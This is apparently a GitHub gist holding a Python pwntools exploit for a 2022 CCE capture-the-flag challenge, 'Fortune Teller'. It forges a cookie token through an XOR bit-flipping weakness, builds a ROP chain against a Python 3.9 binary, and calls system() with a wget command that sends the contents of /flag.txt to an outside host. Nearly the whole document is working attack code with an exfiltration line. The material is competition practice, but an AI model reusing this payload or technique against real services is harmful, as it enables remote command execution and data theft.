- SQLite3 extension reversing
- ROP with bit flipping attack
- Cryptographic logic was identified by bindiff
Created
September 24, 2022 13:38
-
-
Save d0now/9f18929ebcdd4e091553b487581c9f23 to your computer and use it in GitHub Desktop.
2022 CCE - Fortune Teller Exploit Code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import requests | |
| #baseurl = 'http://localhost:31337' | |
| baseurl = 'http://52.78.80.102:31337' | |
| def index(token): | |
| return requests.get(baseurl, cookies={'token': b64e(token)}) | |
| def signin(username, password): | |
| return requests.post(baseurl + '/signin', data={'username': username, 'password': password}, allow_redirects=False) | |
| def signup(username, password): | |
| return requests.post(baseurl + '/signup', data={'username': username, 'password': password}, allow_redirects=False) | |
| def xor_payload_after(payload, offset=0x10): | |
| payload = bytearray(payload) | |
| for i in range(offset, len(payload), 0x10): | |
| before = payload[i-0x10:i] | |
| payload[i:i+0x10] = xor(before, payload[i:i+0x10]) | |
| return bytes(payload) | |
| print("GET") | |
| payload = b'A' * (0x80 - 2) | |
| signup(payload, b'password') | |
| resp = signin(payload, b'password') | |
| token = bytearray(b64d(resp.cookies['token'])) | |
| print(hexdump(token)) | |
| encpad = token[0x38:0x40] | |
| enckey = xor(token[0x30:0x38], b'A' * 0x8) | |
| # payload = token[:0x30] | |
| # payload += encpad * ((0x120 - 0x30) // 0x10) | |
| # index(xor_payload_after(payload, 0x30)) | |
| # 0x00000000006591bf: mov qword ptr [rbp + 0x10], r12; pop rbx; pop rbp; pop r12; ret; | |
| g0 = 0x00000000006591bf | |
| # 0x0000000000424edc: pop rbp; pop r12; pop r13; ret; | |
| g1 = 0x0000000000424edc | |
| # 0x000000000066e2a6: pop rbx; pop rbp; pop r13; ret; | |
| g2 = 0x000000000066e2a6 | |
| # 0x0000000000424ba4: pop r12; ret; | |
| pr = 0x0000000000424ba4 | |
| e = ELF("./python3.9") | |
| pppr = 0x00000000004e6e39 | |
| payload = b'A' * 0x110 | |
| cmd = b'wget http://ch4n3.kr:2334?flag=$(cat /flag.txt)\0' | |
| for i in range(0, len(cmd), 8): | |
| payload += xor(enckey, p64(g1)) | |
| payload += encpad # g1 start | |
| payload += xor(enckey, cmd[i:i+8].ljust(8, b'\0')) # rbp | |
| payload += encpad # r12 | |
| payload += xor(enckey, p64(g2)) # r13 | |
| payload += encpad # g2 start | |
| payload += xor(enckey, p64(e.bss(0x7f0)+i)) # rbx | |
| payload += encpad # rbp | |
| payload += xor(enckey, p64(g0)) # r13 | |
| payload += encpad # g0 start | |
| payload += encpad # rbx | |
| payload += encpad # rbp | |
| payload += xor(enckey, p64(pr)) # r12 | |
| payload += encpad # pr start | |
| payload += xor(enckey, p64(pppr)) | |
| payload += encpad | |
| payload += xor(enckey, p64(e.bss(0x800))) | |
| payload += encpad | |
| payload += xor(enckey, p64(e.plt['system'])) | |
| # payload += xor(enckey, p64(0x41414141)) | |
| payload += encpad | |
| print("EXP") | |
| index(payload) | |
| p.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment